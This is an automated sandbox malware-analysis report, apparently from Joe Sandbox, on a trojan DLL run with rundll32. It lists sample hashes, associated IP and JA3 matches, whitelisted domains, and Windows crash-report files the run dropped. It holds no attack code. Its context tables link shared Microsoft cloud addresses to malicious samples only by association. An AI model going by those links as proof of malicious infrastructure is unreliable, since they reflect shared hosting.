                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Run name:Run with higher sleep bypass
                                                                                Number of analysed new started processes analysed:33
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal96.troj.evad.winDLL@14/12@14/6
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 13.2% (good quality ratio 12.5%)
                                                                                • Quality average: 77.9%
                                                                                • Quality standard deviation: 29.8%
                                                                                HCA Information:
                                                                                • Successful, ratio: 81%
                                                                                • Number of executed functions: 57
                                                                                • Number of non-executed functions: 189
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                • Found application associated with file extension: .dll
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 95.100.218.79, 2.20.178.10, 2.20.178.56, 95.100.216.89, 20.50.102.62, 131.253.33.203, 204.79.197.203, 20.189.173.22, 104.208.16.94, 20.189.173.21, 52.184.81.210, 2.20.178.24, 2.20.178.18, 20.54.110.249, 40.112.88.60
                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, icePrime.a-0003.dc-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                22:35:22API Interceptor1x Sleep call for process: rundll32.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                52.97.178.98uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                  https://storage.googleapis.com/aoffice365-eposes-451227998/index.htmlGet hashmaliciousBrowse
                                                                                    40.97.161.50test1.dllGet hashmaliciousBrowse
                                                                                      6.dllGet hashmaliciousBrowse
                                                                                        6101135878f66.dllGet hashmaliciousBrowse
                                                                                          a9FUs89dWy.dllGet hashmaliciousBrowse
                                                                                            609a460e94791.tiff.dllGet hashmaliciousBrowse
                                                                                              13fil.exeGet hashmaliciousBrowse
                                                                                                24messag.exeGet hashmaliciousBrowse
                                                                                                  .exeGet hashmaliciousBrowse
                                                                                                    .exeGet hashmaliciousBrowse
                                                                                                      66documen.exeGet hashmaliciousBrowse
                                                                                                        9messag.exeGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          MICROSOFT-CORP-MSN-AS-BLOCKUSB6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                          • 52.97.183.162
                                                                                                          P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                          • 40.93.212.0
                                                                                                          b3astmode.x86Get hashmaliciousBrowse
                                                                                                          • 72.154.237.78
                                                                                                          b3astmode.arm7Get hashmaliciousBrowse
                                                                                                          • 20.153.181.154
                                                                                                          b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                          • 20.63.129.213
                                                                                                          TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                          • 20.42.65.92
                                                                                                          PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                          • 40.101.62.34
                                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                          • 52.168.117.173
                                                                                                          ntpclientGet hashmaliciousBrowse
                                                                                                          • 21.215.78.72
                                                                                                          2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                          • 13.92.100.208
                                                                                                          K6E9636KoqGet hashmaliciousBrowse
                                                                                                          • 159.27.209.248
                                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                          • 20.42.73.29
                                                                                                          Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                          • 104.47.53.36
                                                                                                          mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                          • 20.189.173.22
                                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                          • 104.47.53.36
                                                                                                          in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                                          • 40.93.212.0
                                                                                                          xiaomi-home.apkGet hashmaliciousBrowse
                                                                                                          • 104.45.180.93
                                                                                                          canon-camera-connect.apkGet hashmaliciousBrowse
                                                                                                          • 104.45.180.93
                                                                                                          aXNdDIO708.exeGet hashmaliciousBrowse
                                                                                                          • 104.47.53.36
                                                                                                          uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                          • 52.98.208.114

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          ce5f3254611a8c095a3d821d44539877B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          aVFOmbW2t7.dllGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          gxJ83rJkgw.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          yR4AxlwcWJ.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          SGfGZT66wD.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          uT9rwkGATJ.dllGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          XK1PLPuwjL.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          pHEiqE9toa.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.24481.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          vH0SHswvrb.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          NM0NyvZi8O.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          yOTzv1Qz0n.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          SWaTAV7EdD.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          SKMC07102021.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          50r72IVfM0.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          83ONlZMwS9.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61
                                                                                                          Dxr7myLbG2.msiGet hashmaliciousBrowse
                                                                                                          • 52.98.199.194
                                                                                                          • 52.98.208.66
                                                                                                          • 52.97.178.34
                                                                                                          • 52.97.178.98
                                                                                                          • 40.97.161.50
                                                                                                          • 13.82.28.61

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_09f0aab7\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11922
                                                                                                          Entropy (8bit):3.757615495140162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:jIIiv0oXDHygBWjed+x/u7stS274ItWcQ:8IiRXDygBWjec/u7stX4ItWcQ
                                                                                                          MD5:A7E04B92D3FF2630B68DB7BFD15F234B
                                                                                                          SHA1:2DC4F227B387515B9B2F85292925E3A6130D8F89
                                                                                                          SHA-256:7A24FFCD6511ABEE0C923E0CB5AE405DC37DC14AE082A11B676FC554076A5398
                                                                                                          SHA-512:84E32729E07D17D86BF02D8187BCC84882D39C65B21D50E36D3DF1225414B3EC891830F8817E44B90FDC57DE15B473897E2B538DBD6A1A305AA7496DD94A1173
                                                                                                          Malicious:false
                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.0.5.3.5.2.1.9.2.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.0.5.4.9.2.6.6.0.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.9.c.f.e.9.e.-.2.1.c.f.-.4.a.4.2.-.a.d.1.6.-.9.b.6.f.3.7.5.5.6.c.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.e.3.8.0.5.a.-.8.e.1.6.-.4.7.1.b.-.b.3.d.f.-.2.d.f.d.4.0.e.4.8.d.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.c.-.0.0.0.1.-.0.0.1.7.-.3.2.1.8.-.a.b.b.9.2.a.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_06908bb5\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12044
                                                                                                          Entropy (8bit):3.7648840989529164
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:mCsiP0oXSHBUZMX4jed+x/u7stS274It7c+:aixXqBUZMX4jec/u7stX4It7c+
                                                                                                          MD5:3BE35060EBF507559C93F8D1F5EB195B
                                                                                                          SHA1:5F8B547C0693CD5BBECA73FA322D9C3FE9B65353
                                                                                                          SHA-256:E7F44AE2CEF8BFE2CF014F4D3548912DDCE95B11ED79A28B7E5A7042C0CBA7E3
                                                                                                          SHA-512:DADA3BBA9A8ED31CED217F1AA4263EAC8057C5DB2278216BED7322A93AA9BC4A302276D40D84FF0DEE8EA4B07B4DE3128721216DA55C3D1BBCB491895362D87A
                                                                                                          Malicious:false
                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.0.5.3.0.4.6.1.7.5.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.0.5.4.0.9.6.7.2.6.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.4.d.5.1.9.0.-.0.4.c.6.-.4.7.3.1.-.a.a.d.0.-.8.b.2.a.f.9.5.b.2.4.0.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.2.e.c.8.d.4.-.9.2.3.3.-.4.f.9.a.-.b.e.a.c.-.4.6.0.9.c.7.b.1.e.6.9.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.8.-.0.0.0.1.-.0.0.1.7.-.d.b.d.5.-.9.d.b.7.2.a.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_06a0b526\Report.wer
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12042
                                                                                                          Entropy (8bit):3.7633224655126005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:KmrxiH0oXTHBUZMX4jed+5/u7stS274It7cl:Lti5XTBUZMX4jeU/u7stX4It7cl
                                                                                                          MD5:85950B9E9E4E67DE8E5F06F24CC9BF90
                                                                                                          SHA1:EBD85516F99D3D3DC07BB5BFBA834EAE487D708E
                                                                                                          SHA-256:9A31F447CB4C034FAD9CD7856D8CEB9107F86ACDB1D517B353913F72402B0405
                                                                                                          SHA-512:A81A3BDB2E927D7A9CBD6D73616DFAC506CD1D80D1CDE87EB1AC7D310D73A9077E5807484B47E9560DA02EF8F91A32ADE0C68C6EFD1FDD9FA9D2811FD647AA08
                                                                                                          Malicious:false
                                                                                                          Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.0.5.3.8.0.1.7.6.4.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.0.5.5.1.8.6.1.3.3.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.1.8.5.c.b.0.-.e.7.1.8.-.4.e.3.d.-.8.6.2.b.-.7.1.1.f.c.c.6.e.0.5.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.0.0.3.2.4.f.-.c.1.4.1.-.4.f.f.3.-.a.f.b.3.-.5.9.e.0.d.a.9.8.c.d.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.d.4.-.0.0.0.1.-.0.0.1.7.-.d.b.a.f.-.1.e.b.d.2.a.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B10.tmp.dmp
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:32 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35256
                                                                                                          Entropy (8bit):2.4208959350942596
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:JglDlA2Rs//a/f0MLLIZhsg1Qy+S+Ucctqen8IOX:Jv2Rs/C3tL4hsgGtUccl8IQ
                                                                                                          MD5:1F86AC58A89B09958F6BBDF996932D6C
                                                                                                          SHA1:B5C051402F31C21C47DFEBB77F853F1744BFA5EF
                                                                                                          SHA-256:DDA9149E21CEEC51431DE39AD01BAEA1411ECBEF9E04D6C826CC950CE8F74BAE
                                                                                                          SHA-512:6F497D8EDA8161F5D6F8863483063CCB277850A78D15C7B885DAAEC60F1E2452CC2B15E1E94F3968A582E224FE2323520B431AFECDC4A0D515BB4FAD513BBA0A
                                                                                                          Malicious:false
                                                                                                          Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........6.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER63AC.tmp.WERInternalMetadata.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8406
                                                                                                          Entropy (8bit):3.6987300061265027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rrl7r3GLNipT65zh6Yug6nVtOmXgmf8eSjwZCprP89bSOsfNGm:RrlsNit69h6YJ6nVtOmXgmf8eSjwBSNN
                                                                                                          MD5:E03C343BC0633FAF3DF69A060E98C747
                                                                                                          SHA1:5135A8DF7F0E81B7FC6A480ADE2DC1B7CB8926FA
                                                                                                          SHA-256:29B00A99BF02D4F8D6906AD9996D4761AEA35B9A30E92FE4D37154522EA81CF4
                                                                                                          SHA-512:473843DA03DC96C22022591E55F1F8F3BFC0AA54C9D12BACC47D6C3FB0CE08FD7A86E68A787B0E2E3B4C0495A343CF2F2DD20EC95454E448CF020E7CB47CAB3E
                                                                                                          Malicious:false
                                                                                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.6.<./.P.i.d.>.......
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER67D4.tmp.xml
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4771
                                                                                                          Entropy (8bit):4.486523273735861
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cvIwSD8zsmJgtWI9p5rWSC8BRc8fm8M4JCds0MF1+q8vjs0w4SrSrd:uITf8yUSNlJyIKtwDWrd
                                                                                                          MD5:FD9057D258E84F2AB9F3DA66302684D2
                                                                                                          SHA1:CFB67DC24CA388AA63C520A6A9C376283464903B
                                                                                                          SHA-256:2BFE2A84C2D32CFCB07775E0AB48253E5FAC997C9176F069895CE7C53BA34D66
                                                                                                          SHA-512:CEC0C4D580B87D3310DE8C03A3BFBDB7D0694AE64403AB7655F3C84100777B2AC488C43FA92DD60300AD6E6901A39621827457F4B110C2B8EC3A605BF2B42BF1
                                                                                                          Malicious:false
                                                                                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206166" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D9E.tmp.dmp
                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 05:35:38 2021, 0x1205a4 type
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63018
                                                                                                          Entropy (8bit):1.9002202523498852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3peTby7dJdyrIaf0x67tL5n+x5TYi4SJw7Ynh5RY:38fabdi7QQL5SRnf1h5RY
                                                                                                          MD5:10D974B64FF526B2A6BE856FEAE7A23C
                                                                                                          SHA1:2F9FEF4D1C2749CE1B3276CBB0C22DED5C762898
                                                                                                          SHA-256:469BEB63A87C03FF1FE513482FC8AE36E771E67EB2B6AAB9097A41919D47CA2C
                                                                                                          SHA-512:BE81FD47EF2BBE94016415A23FEE50EE74CEC9C686E121A46A1961F774FE1FA08279F66B9D15F668F675B6CD5861BB36D23DABA3D0EFCBC110AF3F3FEDE00068
                                                                                                          Malicious:false
                                                                                                          Preview: MDMP....... .........ea...................U...........B..............GenuineIntelW...........T...........9.ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER788B.tmp.dmp
